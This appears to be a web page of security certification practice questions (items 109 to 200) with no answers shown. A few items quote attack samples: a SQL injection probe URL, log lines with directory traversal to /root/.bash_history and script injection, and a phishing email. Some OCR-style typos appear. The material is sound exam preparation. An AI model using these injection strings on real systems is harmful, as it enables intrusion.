109. A critical system audit shows that the payroll system is not meeting security policy due to missing OS security patches. Upon further review, it appears that the system is not being patched at all. The vendor states that the system is only supported on the current OS patch level. Which of the following compensating controls should be used to mitigate the vulnerability of missing OS patches on this system?
Submit
110. A security policy states that all applications on the network must have a password length of eight characters. There are three legacy applications on the network that cannot meet this policy. One system will be upgraded in six months, and two are not expected to be upgraded or removed from the network. Which of the following processes should be followed?
Submit
111. Joe is a security architect who is tasked with choosing a new NIPS platform that has the ability to perform SSL inspection, analyze up to 10Gbps of traffic, can be centrally managed and only reveals inspected application payload data to specified internal security employees. Which of the following steps should Joe take to reach the desired outcome?
Submit
112. A company has adopted a BYOD program. The company would like to protect confidential information. However, it has been decided that when an employee leaves, thecompany will not completely wipe the personal device. Which of the following would MOST likely help the company maintain security when employees leave?
Submit
113. A recently hired security administrator is advising developers about the secure integration of a legacy in-house application with a new cloud based processing system. The systems must exchange large amounts of fixed format data such as names, addresses, and phone numbers, as well as occasional chunks of data in unpredictable formats. The developers want to construct a new data format and create custom tools to parse and process the data. The security administrator instead suggests that the developers:
Submit
114. Ann, a software developer, wants to publish her newly developed software to an online store. Ann wants to ensure that the software will not be modified by a third party or end users before being installed on mobile devices. Which of the following should Ann implement to stop modified copies of her software from running on mobile devices?
Submit
115. A web services company is planning a one-time high-profile event to be hosted on the corporate website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive Officer (CEO), has requested that his security engineers put temporary preventive controls in place. Which of the following would MOST appropriately address Joe's concerns?
Submit
116. An organization has implemented an Agile development process for front end web application development . A new security architect has just joined the company andwants to integrate security activities into the SDLC.Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO).
Submit
117. An IT Manager is concerned about errors made during the deployment process for a new model of tablet. Which of the following would suggest best practices andconfiguration parameters that technicians could follow during the deployment process?
Submit
118. An assessor identifies automated methods for identifying security control compliance through validating sensors at the endpoint and at Tier 2. Which of the following practices satisfy continuous monitoring of authorized information systems?
Submit
119. A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The core of the POS is an extranet site, accessible only from retail stores and the corporate office over a split-tunnel VPN. An additional split-tunnel VPN provides bi-directional connectivity back to the main office, which provides voice connectivity for store VoIP phones. Each store offers guest wireless functionality, as well as employee wireless. Only the staff wireless network has access to the POS VPN. Recently, stores are reporting poor response times when accessing the POS application from store computers as well as degraded voice quality when making phone calls. Upon investigation, it is determined that three store PCs are hosting malware, which is generating excessive network traffic. After malware removal, the information security department is asked to review the configuration and suggest changes to prevent this from happening again. Which of the following denotes the BEST way to mitigate future malware risk?
Submit
120. A software development manager is taking over an existing software development project. The team currently suffers from poor communication due to a long delay between requirements documentation and feature delivery. This gap is resulting in an above average number of security-related bugs making it into production. Which of the following development methodologies is the team MOST likely using now?
Submit
121. A security consultant is conducting a network assessment and wishes to discover any legacy backup Internet connections the network may have. Where would the consultant find this information and why would it be valuable?
Submit
122. An IT auditor is reviewing the data classification for a sensitive system. The company has classified the data stored in the sensitive system according to the following matrix:DATA TYPE CONFIDENTIALITY INTEGRITYAVAILABILITY---------------------------------------------------------Financial HIGH HIGH LOWClient name MEDIUM MEDIUM HIGHClient address LOW MEDIUM LOW----------------------------------------------------------AGGREGATE MEDIUM MEDIUM MEDIUMThe auditor is advising the company to review the aggregate score and submit it to senior management. Which of the following should be the revised aggregate score?
Submit
123. Company XYZ provides cable television service to several regional areas. They are currently installing fiber-to-the-home in many areas with hopes of also providing telephone and Internet services. The telephone and internet services portions of the company will each be separate subsidiaries of the parent company. The board of directors wishes to keep the subsidiaries separate from the parent company. However all threecompanies must share customer data for the purposes of accounting, billing, and customer authentication. The solution must use open standards, and be simple and seamless for customers, while only sharing minimal data between the companies. Which of the following solutions is BEST suited for this scenario?
Submit
124. A security administrator has noticed that an increased number of employees' workstations are becoming infected with malware. The company deploys an enterpriseantivirus system as well as a web content filter, which blocks access to malicious web sites where malware files can be downloaded. Additionally, the companyimplements technical measures to disable external storage. Which of the following is a technical control that the security administrator should implement next to reducemalware infection?
Submit
125. A large enterprise acquires another company which uses antivirus from a different vendor. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization. Which of the following tools can BEST meet the CISO's requirement?
Submit
126. A security engineer is responsible for monitoring company applications for known vulnerabilities. Which of the following is a way to stay current on exploits and information security news?
Submit
127. The risk manager is reviewing a report which identifies a requirement to keep a business critical legacy system operational for the next two years. The legacy system isout of support because the vendor and security patches are no longer released. Additionally, this is a proprietary embedded system and little is documented and knownabout it. Which of the following should the Information Technology department implement to reduce the security risk from a compromise of this system?
Submit
128. A security engineer is working on a large software development project. As part of the design of the project, various stakeholder requirements were gathered and decomposed to an implementable and testable level. Various security requirements were also documented. Organize the following security requirements into the correct hierarchy required for an SRTM. Requirement 1: The system shall provide confidentiality for data in transit and data at rest. Requirement 2: The system shall use SSL, SSH, or SCP for all data transport. Requirement 3: The system shall implement a file-level encryption scheme. Requirement 4: The system shall provide integrity for all data at rest. Requirement 5: The system shall perform CRC checks on all files.
Submit
129. A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The doctors and specialists access patient records over the hospitals guest WiFi network which is isolated from the internal network with appropriate security controls. The patient records management system can be accessed from the guest network and requires two factor authentication.Using a remote desktop type interface, the doctors and specialists can interact with the hospital's system. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST concern? (Select TWO).
Submit
130. A storage as a service company implements both encryption at rest as well a.s encryption in transit of customers' data. The security administrator is concerned with the overall security of the encrypted customer data stored by the company servers and wants the development team to implement a solution that will strengthen the customer's encryption key. Which of the following, if implemented, will MOST increase the time an offline password attack against the customers' data would take?
Submit
131. A security solutions architect has argued consistently to implement the most secure method of encrypting corporate messages. The solution has been derided as not being cost effective by other members of the IT department. The proposed solution uses symmetric keys to encrypt all messages and is very resistant to unauthorized decryption. The method also requires special handling and security for all key material that goes above and beyond most encryption systems.Which of the following is the solutions architect MOST likely trying to implement?
Submit
132. A security officer is leading a lessons learned meeting. Which of the following should be components of that meeting? (Select TWO).
Submit
133. At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO).
Submit
134. Three companies want to allow their employees to seamlessly connect to each others wireless corporate networks while keeping one consistent wireless client configuration. Each company wants to maintain its own authentication infrastructure and wants to ensure that an employee who is visiting the other two companies is authenticated by the home office when connecting to the other companies' wireless network. All three companies have agreed to standardize on 802.1x EAP-PEAP-MSCHAPv2 for client configuration. Which of the following should the three companies implement?
Submit
135. Which of the following describes a risk and mitigation associated with cloud data storage?
Submit
136. A user is suspected of engaging in potentially illegal activities. Law enforcement has requested that the user continue to operate on the network as normal. However, theywould like to have a copy of any communications from the user involving certain key terms. Additionally, the law enforcement agency has requested that the user's ongoingcommunication be retained in the user's account for future investigations. Which of the following will BEST meet the goals of law enforcement?
Submit
137. An analyst connects to a company web conference hosted on www.webconference.com/meetinglD#01234 and observes that numerous guests have been allowed to join, without providing identifying information. The topics covered during the web conference are considered proprietary to the company. Which of the following security concerns does the analyst present to management?
Submit
138. The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions lo be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are not implemented?
Submit
139. A company is facing penalties for failing to effectively comply with e-discovery requests. Which of the following could reduce the overall risk to the company from this issue?
Submit
140. A risk manager has decided to use likelihood and consequence to determine the risk of an event occurring to a company asset. Which of the following is a limitation of this approach to risk management?
Submit
141. An internal development team has migrated away from Waterfall development to use Agile development. Overall, this has been viewed as a successful initiative by the stakeholders as it has improved time-to-market. However, some staff within the security team have contended that Agile development is not secure. Which of the following is the MOST accurate statement?
Submit
142. An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures theorganization mitigates the risk of managing separate user credentials?
Submit
143. Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of thefollowing security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO).
Submit
144. A new web based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application. Which of the following problems would MOST likely be uncovered by this tool?
Submit
145. The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any payments. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for shipping. A specially crafted value could be entered and cause a roll over, resulting in the shipping cost being subtracted from the balance and in some instances resulted in a negative balance. As a result, the system processed the negative balance as zero dollars. Which of the following BEST describes the application issue?
Submit
146. An organization would like to allow employees to use their network username and password to access a third-party service. The company is using Active Directory Federated Services for their directory service.  Which of the following should the company ensure is supported by the third- party? (Select TWO).
Submit
147. A new IT company has hired a security consultant to implement a remote access system, which will enable employees to telecommute from home using both company issued as well as personal computing devices, including mobile devices. The company wants a flexible system to provide confidentiality and integrity for data in transit to the company's internally developed application GUI. Company policy prohibits employees from having administrative rights to company issued devices. Which of the following remote access solutions has the lowest technical complexity?
Submit
148. An administrator has enabled salting for users' passwords on a UNIX box. A penetration tester must attempt to retrieve password hashes. Which of the following files must the penetration tester use to eventually obtain passwords on the system? (Select TWO}.
Submit
149. An international shipping company discovered that deliveries left idle are being tampered with. The company wants to reduce the idle time associated with international deliveries by ensuring that personnel are automatically notified when an inbound delivery arrives at the transit dock. Which of the following should be implemented to help the company increase the security posture of its operations?
Submit
150. The latest independent research shows that cyber attacks involving SCADA systems grew an average of 15% per year in each of the last four years, but that this years growth has slowed to around 7%. Over the same time period, the number of attacks against applications has decreased or stayed flat each year. At the start of the measure period, the incidence of PC boot loader or BIOS based attacks was negligible.Starting two years ago, the growth in the number of PC boot loader attacks has grown exponentially. Analysis of these trends would seem to suggest which of the following strategies should be employed?
Submit
151. A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. Which of the fol lowing would BEST meet the requirement?
Submit
152. A software developer and IT administrator are focused on implementing security in the organization to protect OSI layer 7. Which of the following security technologieswould BEST meet their requirements? (Select TWO).
Submit
153. A large company is preparing to merge with as smaller company. The smaller company has been very profitable, but the smaller company's main applications were created in-house. Which of the following actions should the large company's security administrator take in preparation for the merger?
Submit
154. A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented. The CISO wants to know upfront what the projected TCO would be before looking further into this concern. Two vendor proposals have been received:Vendor A: product-based solution which can be purchased by the pharmaceutical company.Capital expenses to cover central log collectors, correlators, storage and management consoles expected to be $150,000. Operational expenses are expected to be a 0.5 full time employee (FTE) to manage the solution, and 1 full time employee to respond to incidents per year.Vendor B: managed service-based solution which can be the outsourced for the pharmaceutical company's needs.Bundled offering expected to be $100,000 per year.Operational expenses for the pharmaceutical company to partner with the vendor are expected to be a 0.5 FTE per year.Internal employee costs are averaged to be $80,000 per year per FTE. Based on calculating TCO of the two vendor proposals over a 5 year period, which of the following options is MOST accurate?
Submit
155. Customers are receiving emails containing a link to malicious software. These emails are subverting spam filters. The email reads as follows:Delivered-To: customer@example_comReceived: by 10.14.120.205Mon, 1Nov 201011:15:24 -0700 (PDT)Received: by 10.231.31.193Mon, 01Nov2010 11:15:23 -0700 (PDT)Return-Path: <[email protected]>Received: from 127.0.0.1 for <[email protected]>; Mon, 1Nov2010 13:15:14 -0500 (envelope-from <[email protected]>)Received: by smtpex.example.com (SMTP READY)with ESMTP (AIO); Mon, 01 Nov 2010 13:15:14 -0500Received: from 172.18.45.122 by 192.168.2.55; Mon, 1 Nov2010 13:15:14 -0500 From: Company <[email protected]>To: "[email protected]" <[email protected]>Date: Mon, 1 Nov 2010 13:15:11 -0500Subject: New Insurance ApplicationThread-Topic: New Insurance ApplicationPlease download and install software from the site below to maintain full access to your account.www.examplesite.com---------------------------------------------------Additional information: The authorized mail servers IPs are 192.168.2.10 and 192.168.2.11.The network's subnet is 192.168.2.0/25.Which of the following are the MOST appropriate courses of action a security administrator could take to eliminate this risk? (Select TWO).
Submit
156. A security administrator is shown the following log excerpt from a Unix system:2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51 .100.23 port 37914 ssh22013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51-100.23 port 37915 ssh22013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51-100-23 port 37916 ssh22013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51 .100.23 port 37918 ssh22013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51 .100.23 port 37920 ssh22013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51 .100.23 port 37924 ssh2Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).
Submit
157. A security tester is testing a website and performs the fo llowing manual query: https:/lwww.comptia.com/cookies.jsp?products=5%20and%201=1 The following response is received in the payload:"ORA-000001: SQL command not property ended" Which of the following is the response an example of?
Submit
158. After reviewing a company's NAS configuration and file system access logs, the auditor is advising the security administrator to implement additional security controls on the NFS export. The security administrator decides to remove the no_root_ squash directive from the export and add the nosuid directive. Which of the following is true about the security controls implemented by the security administrator?
Submit
159. A company decides to purchase commercially available software packages. This can introduce new security risks to the network. Which of the following is the BEST description of why this is true?
Submit
160. An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this?
Submit
161. The source workstation image for new accounting PCs has begun blue-screening. A technician notices that the date/lime stamp of the image source appears to have changed. The desktop support director has asked the Information Security department to determine if any changes were made to the source image. Which of the following methods would BEST help with this process? (Select TWO).
Submit
162. A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three changes to deploy a new application onto the network before it is operation~ Security now has a significant effect on overall availability. Which of the following would be the FIRST process to perform as a result of these findings?
Submit
163. A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. Which of the following are true statements? (Select TWO).
Submit
164. A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without externalinteraction from another user with elevated privileges. This requirement is BEST described as an implementation of:
Submit
165. An organization has several production critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Which of the following BEST maximizesthe protection of these systems from malicious software?
Submit
166. A company is deploying a new iSCSl- based SAN. The requirements are as follows:SAN nodes must authenticate each other.Shared keys must NOT be used.Do NOT use encryption in order to gain performance.Which of the following design specifications meet all the requirements? (Select TWO).
Submit
167. A web developer is responsible for a simple web application that books holiday accommodations. The front-facing web server offers an HTML form, which asks for a use(s age. This input gets placed into a signed integer variable and is then checked to ensure that the user is in the adult age range.Users have reported that the website is not functioning correctly. The web developer has inspected log files and sees that a very large number (in the billions) was submitted just before the issue started occurring.Which of the following is the MOST likely situation that has occurred?
Submit
168. Company ABC's SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN?
Submit
169. Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO).
Submit
170. A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two week period andconsequently have the following requirements:Requirement 1 Ensure their server infrastructure operating systems are at their latest patch levelsRequirement 2 Test the behavior between the application and databaseRequirement 3 Ensure that customer data can not be exfiltratedWhich of the following is the BEST solution to meet the above requirements?
Submit
171. A finance manager says that the company needs to ensure that the new system can "replay" data, up to the minute, for every exchange being tracked by the investment departments. The finance manager also states that the company's transactions need to be tracked against this data for a period of five years for compliance. How would a security engineer BEST interpret the finance manager's needs?
Submit
172. A medical device manufacturer has decided to work with another international organization to develop the software for a new robotic surgical platform to be introduced into hospitals within the next 12 months. In order to ensure a competitor does not become aware, management at the medical device manufacturer has decided to keep it secret until formal contracts are signed. Which of the following documents is MOST likely to contain a description of the initial terms and arrangement and is not legally enforceable?
Submit
173. A popular commercial virtualization platform allows for the creation of ~rtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
Submit
174. A small company's Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the company's security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST?
Submit
175. A facilities manager has observed varying electric use on the company's metered service lines. The facility management rarely interacts with the IT department unless new equipment is being delivered. However, the facility manager thinks that there is a correlation between spikes in electric use and IT department activity. Which of the following business processes and/or practices would provide better management of organizational resources with the IT department's needs? (Select TWO).
Submit
176. A forensic analyst works for an e-discovery firm where several gigabytes of data are processed daily. While the business is lucrative, they do not haw the resources or the scalability to adequately serve their clients. Since it is an e-discovery firm where chain of custody is important, which of the following scenarios should they consider?
Submit
177. During a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote accessapplication that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had already beeninstalled on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a more appropriatesolution?
Submit
178. The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements?
Submit
179. The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement?
Submit
180. An accountant at a small business is trying to understand the value of a server to determine if the business can afford to buy another server for DR. The risk manager only provided the accountant with the SLE of $24,000, ARO of 20% and the exposure factor of 25%. Which of the following is the correct asset value calculated by the accountant?
Submit
181. The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?
Submit
182. The security administrator finds unauthorized tables and records, which were not present before, on a Linux database server. The database server communicates only with one web server, which connects to the database server via an account with SELECT only privileges. Web server logs show the following:90.76.165.40 - [08/Mar/2014:10:54:04] "GET calendar.php?create%20table%20hidden HTTP/1.1" 200 572490.76.165.40 - [08/Mar/2014:10:54:05] "GET .. / .. / .. /root/.bash_history HTTP/1.1" 200 5724 90.76.165.40 - [08/Mar/2014:10:54:04] "GET index.php?user=<script>Create</script> HTTP/1.1" 200 5724The security administrator also inspects the following file system locations on the database server using the command 'Is -al /root'drwxrwxrwx 11 root root 4096 Sep 28 22:45 .drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..-rws- --- 25 root root 4096 Mar 8 09:30 .bash_history -rw--- -- 25 root root 4096 Mar 8 09:30 .bash_history -rw---- 25 root root 4096 Mar 8 09:30 .profile-rw--- -- 25 root root 4096 Mar 8 09:30 .sshWhich of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO).
Submit
183. Company XYZ has purchased and is now deploying a new HTML5 application. The company wants to hire a penetration tester to evaluate the security of the client and server components of the proprietary web application before launch. Which of the following is the penetration tester MOST likely to use while performing black box testing of the security of the company's purchased application? (Select TWO).
Submit
184. The risk manager has requested a security solution that is cent rally managed, can easily be updated, and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?
Submit
185. An insurance company has an online quoting system for insurance premiums. It allows potential customers to fill in certain details about their car and obtain a quote. During an investigation, the following pat.terns were detected:Pattern 1 Analysis of the logs identifies that insurance premium forms are being filled in but only single fields are incrementally being updated. Pattern 2 For every quote completed, a new customer number is created; due to legacy systems, customer numbers are running out.Which of the following is the attack type the system is susceptible to, and what is the BEST way to defend against it? (Select TWO).
Submit
186. Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs hosted on the same physical platform?
Submit
187. An employee is performing a review of the organization's security functions and noticed that there is some cross over responsibility between the IT security team and the financial fraud team. Which of the following security documents should be used to clarify the roles and responsibilities between the teams?
Submit
188. Company policy requires that all unsupported operating systems be removed from the network. The security administrator is using a combination of network based tools to identify such systems for the purpose of disconnecting them from the network. Which of the following tools, or outputs from the tools in use, can be used to help the security administrator make an approximate determina1ion of the operating system in use on the local company network? (Select THREE).
Submit
189. An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure?
Submit
190. An organization recently upgraded its wireless infrastructure to support 802.1x and requires all clients to use this method. After the upgrade, several critical wireless clients fail to connect because they are only pre-shared key compliant. For the foreseeable future, none of the affected clients have an upgrade path to put them into compliance with the 802.1x requirement. Which of the following provides the MOST secure method of integrating the non-compliant clients into the network?
Submit
191. An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets with a source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network. Which of the following is the administrator attempting to prevent?
Submit
192. A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?
Submit
193. A company that must comply with regulations is searching for a laptop encryption product to use for its 40,000 end points. The product must meet regulations but also be flexible enough to minimize overhead and support in regards to password resets and lockouts. Which of the following implementations would BEST meet the needs?
Submit
194. Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the security administrator learns that the existing routers have the minimum processing power to do the required level of encryption. Which of the following solutions minimizes the performance impact on the router?
Submit
195. A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO).
Submit
196. A company is in the process of implementing a new front end user interface for its customers, the goal is to provide them with more self service functionality. The application has been written by developers over the last six months and the project is currently in the test phase. Which of the following security activities should be implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO).
Submit
197. The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. The organization has not addressed telecommuting in the past. The implementation of a new SSL-VPN and a VOiP phone solution enables personnel to work from remote locations with corporate assets. Which of the following steps must the committee take FIRST to outline senior management's directives?
Submit
198. A security engineer on a large enterprise network needs to schedule maintenance within a fixed window of time. A total outage period of four hours is permitted for servers. Workstations can undergo maintenance from 8:00 pm to 6:00 am daily. Which of the following can specify parameters for the maintenance work? (Select TWO).
Submit
199. A project manager working for a large city government is required to plan and build a WAN, which will be required to host official business and public access. It is also anticipated that the city's emergency and first response communication systems will be required to operate across the same network. The project manager has experience with enterprise IT projects, but feels this project has an increased complexity as a result of the mixed business I public use and the critical infrastructure it will provide. Which of the following should the project manager release to the public, academia, and private industry to ensure the city provides due care in considering all project factors prior to building its new WAN?
Submit
200. A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. After creating an image and determining the directory location of the malware file, which of the following helps to determine when the system became infected?
Submit
View My Results

Quiz Review Timeline (Updated): Mar 20, 2022 +

Our quizzes are rigorously reviewed, monitored and continuously updated by our expert board to maintain accuracy, relevance, and timeliness.

  • Current Version
  • Mar 20, 2022
    Quiz Edited by
    ProProfs Editorial Team
  • Sep 06, 2016
    Quiz Created by
    Catherine Halcomb
Cancel
  • All
    All (200)
  • Unanswered
    Unanswered ()
  • Answered
    Answered ()
The Information Security Officer (ISO) believes that the company has...
A firm's Chief Executive Officer (CEO) is concerned that IT staff...
The Chief Executive Officer (CEO) of a company that allows...
A multi-national company has a highly mobile workforce and minimal IT...
The helpdesk is receiving multiple calls about slow and intermittent...
A security administrator is performing VDI traffic data collection on...
Company XYZ provides hosting services for hundreds of companies across...
In a situation where data is to be recovered from an attacker's...
An application present on the majority of an organization's 1,000...
Using SSL, an administrator wishes to secure public facing server...
Which of the following activities is commonly deemed "OUT OF...
During a new desktop refresh, all hosts are hardened at the OS level...
Two separate companies are in the process of integrating their...
A system administrator has just installed a new Linux distribution....
An intruder was recently discovered inside the data center, a highly...
Due to compliance regulations, a company requires a yearly penetration...
A security administrator was doing a packet capture and noticed a...
A well-known retailer has experienced a massive credit card breach....
An administrator wishes to replace a legacy clinical software product...
A company has a difficult time communicating between the security...
A company with 2000 workstations is considering purchasing a HIPS to...
The Information Security Officer (ISO) is reviewing a summary of the...
A trucking company delivers products all over the country. The...
A security analyst, Ann, states that she believes Internet facing file...
Which of the following technologies prevents an unauthorized HBA from...
The IT Security Analyst for a small organization is working on a...
A company has received the contract to begin developing a new suite of...
A member of the software development team has requested advice from...
A security architect is designing a new infrastructure using both type...
A company has decided to change its current business direction and...
An information security assessor for an organization finished an...
A large organization has recently suffered a massive credit card...
An insurance company is looking to purchase a smaller company in...
The Chief Information Security Officer (CISO) is asking for ways to...
Two universities are making their 802.11n wireless networks available...
A pentester must attempt to crack passwords on a windows domain that...
ABC Corporation has introduced token-based authentication to system...
A bank has decided to outsource some existing IT functions and systems...
VPN users cannot access the active FTP server through the router but...
The Chief Information Officer (CIO) is reviewing the IT centric BIA...
It has come to the IT administrator's attention that the...
Ann, a systems engineer, is working to identify an unknown node on the...
The administrator is troubleshooting availability issues on an...
ODBC access to a database on a network-connected host is required. The...
The DLP solution has been showing some unidentified encrypted data...
A security manager has received the following email from the Chief...
A security manager looked at various logs while investigating a recent...
An administrator believes that the web servers are being flooded with...
An industry organization has implemented a system to allow trusted...
Company ABC is hiring customer service representatives from Company...
Joe, a hacker, has discovered he can specifically craft a webpage that...
A human resources manager at a software development company has been...
Select id, firstname, lastname from authorsUser input= firstname=...
A small company is developing a new Internet-facing web application....
A new piece of ransomware got installed on a company's backup...
A security administrator wants to calculate the ROI of a security...
The Chief Executive Officer (CEO) of a small start-up company wants to...
The telecommunications manager wants to improve the process for...
Since the implementation of IPv6 on the company network, the security...
A company provides on-demand cloud computing resources for a sensitive...
A security administrator is tasked with increasing the availability of...
Executive management is asking for a new manufacturing control and...
A company has received the contract to begin developing a new suite of...
During an incident involving the company main database, a team of...
Which of the following provides the BEST risk calculation methodology?
A company Chief Information Officer (CIO) is unsure which set of...
A security analyst has been asked to develop a quantitative risk...
A systems administrator establishes a CIFS share on a UNIX device to...
A mature organization with legacy information systems has incorporated...
Due to compliance regulations, a company requires a yearly penetration...
A security manager is looking into the following vendor proposal for a...
A penetration tester is assessing a mobile banking application....
A company sales manager received a memo from the company's...
An IT manager is working with a project manager from another...
A security auditor suspects two employees of having devised a scheme...
The risk manager at a small bank wants to use quantitative analysis to...
A security administrator was recently hired in a start -up company to...
An information security assessor for an organization finished an...
A system worth $100,000 has an exposure factor of eight percent and an...
The helpdesk manager wants to find a solution that will enable the...
The helpdesk department desires to roll out a remote support...
An IT manager is concerned about the cost of implementing a web...
A port in a fibre channel switch failed, causing a costly downtime on...
In an effort to minimize costs, the management of a small candy...
ABC Corporation uses multiple security zones to protect systems and...
A company is trying to decide how to manage hosts in a branch location...
Joe, the Chief Executive Officer (CEO), was an Information security...
After being notified of an issue with the online shopping cart, where...
After the install process, a software application executed an on line...
An investigator wants to collect the most volatile data first in an...
A company has issued a new mobile device policy permitting BYOD and...
After a security incident, an administrator would like to implement...
A government agency considers confidentiality to be of utmost...
The security engineer receives an incident ticket from the helpdesk...
A developer has implemented a piece of client-side JavaScript code to...
A security administrator notices the following line in a server's...
A user has a laptop configured with multiple operating system...
A security manager for a service provider has approved two vendors for...
The network administrator at an enterprise reported a large data leak....
Ann is testing the robustness of a marketing website through an...
A senior network security engineer has been tasked to decrease the...
An administrator is implementing a new network-based storage device....
An administrator is tasked with securing several website domains on a...
A Chief Financial Officer (CFO) has raised concerns with the Chief...
A completely new class of web-based vulnerabilities has been...
An extensible commercial software system was upgraded to the next...
There have been some failures of the company's internal facing...
A university requires a significant increase in web and database...
A critical system audit shows that the payroll system is not meeting...
A security policy states that all applications on the network must...
Joe is a security architect who is tasked with choosing a new NIPS...
A company has adopted a BYOD program. The company would like to...
A recently hired security administrator is advising developers about...
Ann, a software developer, wants to publish her newly developed...
A web services company is planning a one-time high-profile event to be...
An organization has implemented an Agile development process for front...
An IT Manager is concerned about errors made during the deployment...
An assessor identifies automated methods for identifying security...
A small retail company recently deployed a new point of sale (POS)...
A software development manager is taking over an existing software...
A security consultant is conducting a network assessment and wishes to...
An IT auditor is reviewing the data classification for a sensitive...
Company XYZ provides cable television service to several regional...
A security administrator has noticed that an increased number of...
A large enterprise acquires another company which uses antivirus from...
A security engineer is responsible for monitoring company applications...
The risk manager is reviewing a report which identifies a requirement...
A security engineer is working on a large software development...
A large hospital has implemented BYOD to allow doctors and specialists...
A storage as a service company implements both encryption at rest as...
A security solutions architect has argued consistently to implement...
A security officer is leading a lessons learned meeting. Which of the...
At 9:00 am each morning, all of the virtual desktops in a VDI...
Three companies want to allow their employees to seamlessly connect to...
Which of the following describes a risk and mitigation associated with...
A user is suspected of engaging in potentially illegal activities. Law...
An analyst connects to a company web conference hosted on...
The Chief Executive Officer (CEO) of a large prestigious enterprise...
A company is facing penalties for failing to effectively comply with...
A risk manager has decided to use likelihood and consequence to...
An internal development team has migrated away from Waterfall...
An organization is selecting a SaaS provider to replace its legacy, in...
Joe, a penetration tester, is tasked with testing the security...
A new web based application has been developed and deployed in...
The finance department for an online shopping website has discovered...
An organization would like to allow employees to use their network...
A new IT company has hired a security consultant to implement a remote...
An administrator has enabled salting for users' passwords on a...
An international shipping company discovered that deliveries left idle...
The latest independent research shows that cyber attacks involving...
A security administrator wants to deploy a dedicated storage solution...
A software developer and IT administrator are focused on implementing...
A large company is preparing to merge with as smaller company. The...
A Chief Information Security Officer (CISO) has requested that a SIEM...
